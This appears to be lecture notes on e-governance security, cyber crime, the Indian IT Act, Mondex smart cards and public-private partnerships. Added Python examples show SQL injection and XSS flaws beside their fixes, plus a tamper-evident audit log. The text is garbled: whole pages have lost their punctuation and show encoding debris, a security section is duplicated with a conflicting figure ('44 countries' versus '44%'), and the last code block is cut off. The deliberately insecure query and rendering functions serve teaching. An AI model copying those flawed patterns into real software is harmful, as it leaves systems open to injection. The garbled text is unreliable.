understanding an organization's information security requirements and the need to establish policy and objectives for information security;

implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;

monitoring and reviewing the performance and effectiveness of the ISMS; and

continual improvement based on objective measurement.

Data security requires a set of security requirements:

Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.

Authorization: the capability to grant access rights to resources; the process of verifying that someone has the right to do what she is trying to do.

Confidentiality: the capability to prevent unauthorized access to information.

Integrity: the capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.

Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.

Non-repudiation: the capability to prevent a person or system intervening in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are shown below:

Protecting premises, equipment and systems software, including input-output units.

Protecting software applications used to process personal data.

Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.

Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.

Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis.

Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness.

Continually improve its control environment.

Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. One research study found 816 e-Government web sites from 212 different countries to be vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
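The two defects named here, as an added example that is not from the original notes: a citizen-record lookup for an e-Government portal written once with the SQL string built from user input and once parameterised, and the record page rendered once unescaped and once escaped. The register table, the sample rows and the function names are assumptions made for illustration.

```python
"""
Citizen-record lookup for an e-Government portal: the two defects named above
(SQL injection and XSS) beside their hardened forms.

Added example, not code from the original notes. The table layout, the sample
rows and the function names are constructed for illustration.
"""
import html
import sqlite3

# Constructed sample register. The apostrophe in the second name is legitimate
# input that a string-built query cannot cope with.
SAMPLE_ROWS = [
    ("C-1001", "Asha Verma", "Lucknow"),
    ("C-1002", "Ravi O'Brien", "Chennai"),
]


def open_registry() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the sample register."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (cid TEXT PRIMARY KEY, name TEXT, city TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def find_by_name_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Defect: the user-supplied name is pasted into the SQL text.

    A quote character in `name` terminates the string literal and changes the
    structure of the statement. The database cannot tell data from code here.
    """
    sql = f"SELECT cid, name, city FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_by_name_safe(conn: sqlite3.Connection, name: str) -> list:
    """Fix: a parameterised query.

    The statement text is constant; `name` is bound as a value by the driver,
    so whatever characters it contains are compared literally against the column.
    """
    sql = "SELECT cid, name, city FROM citizens WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def unsafe_query_breaks_on(conn: sqlite3.Connection, name: str) -> bool:
    """True when the string-built query is not even parseable for this input.

    This is the detectable symptom of the defect: legitimate names containing
    an apostrophe raise syntax errors, and the same mechanism lets crafted
    input alter the query. A parameterised query has no such failure mode.
    """
    try:
        find_by_name_unsafe(conn, name)
        return False
    except sqlite3.OperationalError:
        return True


def render_record_unsafe(name: str) -> str:
    """Defect: user-controlled text is echoed into HTML without escaping.

    Any markup inside `name` is interpreted by the browser as part of the page,
    which is the root cause of stored and reflected XSS.
    """
    return f"<p>Record holder: {name}</p>"


def render_record_safe(name: str) -> str:
    """Fix: escape for the HTML text context before interpolating."""
    return f"<p>Record holder: {html.escape(name, quote=True)}</p>"


if __name__ == "__main__":
    registry = open_registry()
    print("safe lookup:", find_by_name_safe(registry, "Ravi O'Brien"))
    print("unsafe lookup breaks:", unsafe_query_breaks_on(registry, "Ravi O'Brien"))
    print(render_record_safe("<b>Ravi</b> O'Brien"))
```

The parameterised lookup returns the record for a name containing an apostrophe, while the string-built query fails to parse on the same legitimate input; the escaped renderer turns any markup in the name into inert text.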

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies, and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking has witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions, requesting them to enter their username, password or other personal information to access their account for some reason.

The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on E-commerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures access;

Downloads, copies or extracts any data, computer database or any information;

Introduces or causes to be introduced any virus or contaminant;

Disrupts or causes disruption;

Denies or causes denial of access to any person;

Provides any assistance to any person to facilitate access;

Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

Any information that is grossly offensive or has menacing character; or

Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years, or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues

1. Legal recognition of electronic documents

2. Legal recognition of digital signatures

3. Offences and contraventions

4. Justice dispensation systems for cybercrimes

Offences -

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A - Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms-

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Page 42: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 41

41

The design of a Mondex smart card allows end users to transfer funds electronically onto the card

and then utilize the Mondex smart card to make purchases up to the total cash value held on the

card Mondex smart cards provide an electronicpayment system using all the capabilities

associated with smart card technology The Mondex smart card can be a convenient alternative

to cash

Although the design was five years old at the time the Mondex smart card was actually launched

in 1995 ndash two years before MasterCard assumed control of the technology

The banks that currently support the Mondex smart card include National Bank of Canada

Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto

Dominion Bank With so many respected lending institutions banking on the idea the Mondex

smart card is worth a closer look

The Mondex smart card has the ability to make card-to-card transfers which is not possible with

standard credit or debit cards When you use a creditdebit card to make a purchase

communication is required between the bank and your card However Mondex cards contain an

embedded microprocessor with sophisticated encryption methods and tamper-proof hardware

designed to protect them from hackers The ability of the Mondex smart card to do offline

transactions means they are less dependent on expensive network infrastructure reducing

transaction costs Offline transactions may seem anonymous however they actually are recorded

in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card

is used at an ATM or as soon as the retailer uploads transaction data to the bank computer

A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-

paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex

card without revealing your identity Each card has a unique identification number through which

owners can easily be identified Mondex smart cards have not been as successful as originally

predicted Customers have not been especially satisfied with the card and its services Unlike a

credit or debit card your money may be lost forever if you should lose a Mondex smart card

Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected

against any loss exceeding $50 dollars This protection is not currently available with a Mondex

smart card

According to the Mondex smart card system it is fully auditable There is a log of the time date

amount and participants of each transaction which hampers the privacy of users Technically

however Mondex canrsquot claim to be a fully auditable system After a number of transactions

overflow can occur as a result of limited memory in the Mondex smart-cards This means that

PREPARED BY ARUN PRATAP SINGH 42

42

significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a

critical design flaw making it difficult for Mondex to reliably detect fraud

While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate

minor fraud loss

Mondex believes their electronic payment system is secure They are convinced that critics who

have voice concern over security issues are mistaken and misinformed Perhaps the use of a

Mondex smart card depends on a personal level of trust

E-GOVERNANCE

Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard

definition of this term Different governments and organizations define this term to suit their own

aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-

Governancersquo

Several dimensions and factors influence the definition of e-governance or electronic

governance The word ldquoelectronicrdquo in the term e-governance implies technology driven

governance E-governance is the application of information and communication technology (ICT)

for delivering government services exchange of information communication transactions

integration of various stand-alone systems and services between government-to-customer (G2C)

government-to-business (G2B) government-to-government (G2G) as well as back office

processes and interactions within the entire government framework Through e-governance

government services will be made available to citizens in a convenient efficient and transparent

manner The three main target groups that can be distinguished in governance concepts are

government citizens and businessesinterest groups In e-governance there are no distinct

boundaries

Generally four basic models are available ndash government-to-citizen (customer) government-to-

employees government-to-government andgovernment-to-business

Difference between E-Government and E-Governance ndash

Both the terms are treated to be the same however there is some difference between the two

E-government is the use of the ICTs in public administration - combined with organizational

change and new skills - to improve public services and democratic processes and to strengthen

support to public The problem in this definition to be congruence definition of e-governance is

that there is no provision for governance of ICTs As a matter of fact the governance of ICTs

requires most probably a substantial increase in regulation and policy-making capabilities with

all the expertise and opinion-shaping processes among the various social stakeholders of these

PREPARED BY ARUN PRATAP SINGH 43

43

concerns So the perspective of the e-governance is the use of the technologies that both help

governing and have to be governed The Public-Private Partnership (PPP) based e-governance

projects are hugely successful in India United Telecoms Limited known as UTL is a major player

in India on PPP based e-governance projects Each project had mammoth state wide area

networks in these states

E-governance is the future many countries are looking forward to for a corruption-free

government E-government is one-way communication protocol whereas e-governance is two-

way communication protocol The essence of e-governance is to reach the beneficiary and ensure

that the services intended to reach the desired individual has been met with There should be an

auto-response to support the essence of e-governance whereby the Government realizes the

efficacy of its governance E-governance is by the governed for the governed and of the

governed

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services

Statistical information published by governments and world bodies does not always reveal the

facts The best form of e-governance cuts down on unwanted interference of too many layers

while delivering governmental services It depends on good infrastructural setup with the support

of local processes and parameters for governments to reach their citizens or end

beneficiaries Budget for planning development and growth can be derived from well laid out e-

governance systems

Why e-Governance

E-Government can transform citizen service provide access to information to empower citizens

enable their participation in government and enhance citizen economic and social opportunities

so that they can make better lives for themselves and for the next generation

BASIC ARCHITECTURE

PREPARED BY ARUN PRATAP SINGH 44

44

A suggested architecture for e-Governance is shown in the diagram where it is illustrated that

Applications from various departments can be integrated together so as to be accessed by any

terminal or computer from any other department or anywhere through the network This is

because of the characteristics of CORBA - it is location transparent language independent

implementation independent architecture and Operating System independent The applications

connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA

specifications or any new Web application or could be even a data base environment using

Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-

Governance is possible if the middleware is designed to have the necessary services like

Transactions Data Base Management Messaging and Naming

Regarding security aspects CORBA Security standard is built around existing security

specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and

Generic Security Service (GSS) API While these technologies are heavily weighted Public Key

Security with Secured Socket Layer (SSL) is popular with Internet based transactions

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows

G2G (Government to Government)

In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output

PREPARED BY ARUN PRATAP SINGH 45

45

G2C (Government to Citizens)

In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly

G2B (Government to Business)

Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently

G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with

its employees on a regular basis This interaction is a two-way process between the

organization and the employee Use of ICT tools helps in making these interactions fast

and efficient on the one hand and increase satisfaction levels of employees on the other

Difference between G2B and B2G

Government to business (G2B)- Refers to the conducting of transactions between

government bodies and business via internet

Business to government (B2G)- Professional affairs conducted between companies and

regional municipal or federal governing bodies B2G typically encompasses the

determination and evaluation of proposal and completion of contract

PUBLIC PRIVATE PARTNERSHIPS

bull Agreement between Government and the Private Sector for the Provision of a Public

Good or Service by the Latter

bull Generally but not always involving

ndash Long Term Contracts

ndash User Charges andor Payments flowing between the Parties

ndash Shared Investments but Mainly Private

PREPARED BY ARUN PRATAP SINGH 46

46

ndash Risk Sharing by the Parties

bull Must be a Partnership

A public-private partnership exists when public sector agencies (federal state or local) join with

private sector entities (companies foundations academic institutions or citizens) and enter into a

business relationship to attain a commonly shared goal that also achieves objectives of the

individual partners

Why do them

bull Fiscal Head Room

bull As a Way of Financing the Project

bull Separate Policy amp Regulation from Operations

PREPARED BY ARUN PRATAP SINGH 47

47

bull Make the Good or Service Available

bull Pay for Performance and Output

bull Introduce Competition ndash For and In the Market

PREPARED BY ARUN PRATAP SINGH 48

48

The Need to Set the Right Priorities ndash

Four Basic Dimensions of P3

Although each is unique all P3rsquos include four basic characteristics

Shared goals

Shared resources (time money expertise people)

Shared risks

Shared benefits

Benefits

Expedited project completion

Project cost savings

Improved quality

Use of private resources

Access to new sources of private capital

Two Major Steps

PREPARED BY ARUN PRATAP SINGH 49

49

Crafting the Partnership

Implementing the Partnership

Project Management – Six Distinct Phases

1. Genesis
   What's the need? What's driving the need (the rationale): facility non-compliance, natural disaster, budget deficit? Is there a need for a Public/Private Partnership?

2. Preliminary Project Definition (Feasibility)
   Is a Public/Private Partnership feasible, not only financially but practically? Can it be done? Market research; economic/financial analysis; program, budget and schedule; risk analysis.

3. Plan and Test (Final project definition)
   What is the best way to complete the project? Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics? Master schedule/budget; political climate; any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
   How do you choose and contract with the best-value private partner? What's the best delivery method: Design-Bid-Build, Design-Build or Finance-Design-Build? What do current statutes allow? Procurement approach: sole source, RFP or low bid. Risk allocation between public and private partners; structuring of contract risks and rewards.

5. Implement
   Environmental review, design, permitting, construction, commissioning and administration.

6. Operate
   Startup, monitoring, assessment, enhancement, contract modifications, contract renegotiations.

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries, which hold the top three scores on the readiness index, all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of a country's readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organisation for Economic Co-operation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will depend heavily on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS;
• continual improvement based on objective measurement.

Data security rests on a set of security requirements:
• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in it.
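The integrity and traceability requirements above are easiest to see in a tamper-evident audit trail. What follows is an added example, not code from the original notes: a hash-chained, keyed (HMAC-SHA256) audit log in Python in which each entry's tag covers the entry's own fields plus the previous entry's tag, so that editing, deleting or reordering any entry is detected on verification and the first bad position is reported. The key, the AuditLog class, the sample entries and the function names are all constructed for this example. Note what it does not give you: an HMAC proves an entry was written by a holder of the log key (integrity and traceability), not non-repudiation; for that, each actor would have to sign entries with a private key only they hold.

```python
import hashlib
import hmac
import json

# Assumed: the log service holds this key and clients never see it.
# Constructed for the example; a real deployment keeps it in an HSM or KMS.
LOG_KEY = b"constructed-demo-key-do-not-use"
GENESIS_TAG = "0" * 64  # the tag "before" the first entry


def entry_tag(prev_tag: str, record: dict) -> str:
    """HMAC over the previous tag plus a canonical JSON encoding of the record.
    Canonical encoding (sorted keys, no whitespace) makes the tag reproducible."""
    payload = json.dumps(record, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(LOG_KEY, prev_tag.encode() + payload, hashlib.sha256).hexdigest()


class AuditLog:
    """Append-only log. Each entry's tag depends on the previous tag, so the
    entries form a chain: editing, deleting or reordering one entry changes
    every tag from that point on, and verify() reports the first bad position."""

    def __init__(self):
        self.entries = []

    def append(self, actor: str, action: str, target: str, ts: str) -> dict:
        prev_tag = self.entries[-1]["tag"] if self.entries else GENESIS_TAG
        record = {"seq": len(self.entries), "ts": ts, "actor": actor,
                  "action": action, "target": target}
        entry = dict(record, tag=entry_tag(prev_tag, record))
        self.entries.append(entry)
        return entry

    def verify(self):
        """Recompute the chain from the genesis tag.
        Returns (True, None) if intact, else (False, index_of_first_bad_entry)."""
        prev_tag = GENESIS_TAG
        for i, entry in enumerate(self.entries):
            record = {k: v for k, v in entry.items() if k != "tag"}
            expected = entry_tag(prev_tag, record)
            if entry["seq"] != i or not hmac.compare_digest(expected, entry["tag"]):
                return False, i
            prev_tag = entry["tag"]
        return True, None

    def actions_by(self, actor: str) -> list:
        """Traceability query: every action a given actor performed, in order."""
        return [(e["seq"], e["ts"], e["action"], e["target"])
                for e in self.entries if e["actor"] == actor]


def sample_log() -> AuditLog:
    """Constructed sample entries for a citizen-records service."""
    log = AuditLog()
    log.append("clerk42", "UPDATE", "citizen/1001", "2024-01-01T09:00:00Z")
    log.append("clerk42", "READ", "citizen/1002", "2024-01-01T09:01:00Z")
    log.append("auditor7", "EXPORT", "citizen/*", "2024-01-01T09:02:00Z")
    return log


def tamper_and_verify(kind: str):
    """Apply one tampering attempt to a fresh sample log and return what
    verify() reports. kind is 'edit', 'delete' or 'swap'."""
    log = sample_log()
    if kind == "edit":      # insider rewrites who did the UPDATE
        log.entries[0]["actor"] = "nobody"
    elif kind == "delete":  # insider removes the READ entry
        del log.entries[1]
    elif kind == "swap":    # insider reorders the last two entries
        log.entries[1], log.entries[2] = log.entries[2], log.entries[1]
    return log.verify()


if __name__ == "__main__":
    print("intact:", sample_log().verify())
    for k in ("edit", "delete", "swap"):
        print(k, "->", tamper_and_verify(k))
```

The chain only protects entries that were written before the attacker gained access; an attacker who obtains the key can rebuild the whole chain, which is why the key belongs in a separate trust domain from the application that produces the entries, and why production systems periodically anchor the latest tag somewhere the attacker cannot rewrite (a remote write-once store or a signed timestamp).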

Examples of organizational and technical measures to prevent unauthorized access and processing:
• Protecting premises, equipment and systems software, including input-output units
• Protecting software applications used to process personal data
• Preventing unauthorized access to personal data during transmission, including transmission via telecommunication means and networks
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, they have not yet been adequately addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Documented cyber attacks use techniques such as packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government web sites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries to be vulnerable to Cross-Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity (and just as readily confidentiality, since the attacker controls the query), while XSS is a vulnerability which attackers may exploit to steal users' information.
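To make the two weaknesses above concrete, here is an added example, not code from the original notes nor from the study they cite, written in Python against an in-memory SQLite database of constructed citizen records. Each bug is shown in a vulnerable form beside its hardened form: for SQL injection, a lookup that leaks every row and an update that rewrites every row (the integrity loss described above), fixed with parameter binding and input-type validation; for XSS, a greeting that reflects user input into HTML, fixed with output escaping. The table, rows and function names are assumptions of the example.

```python
import html
import sqlite3

# Constructed sample data: a toy citizen-records table.
SAMPLE_ROWS = [("Asha", "TX-1001"), ("Ravi", "TX-1002")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, tax_id TEXT)"
    )
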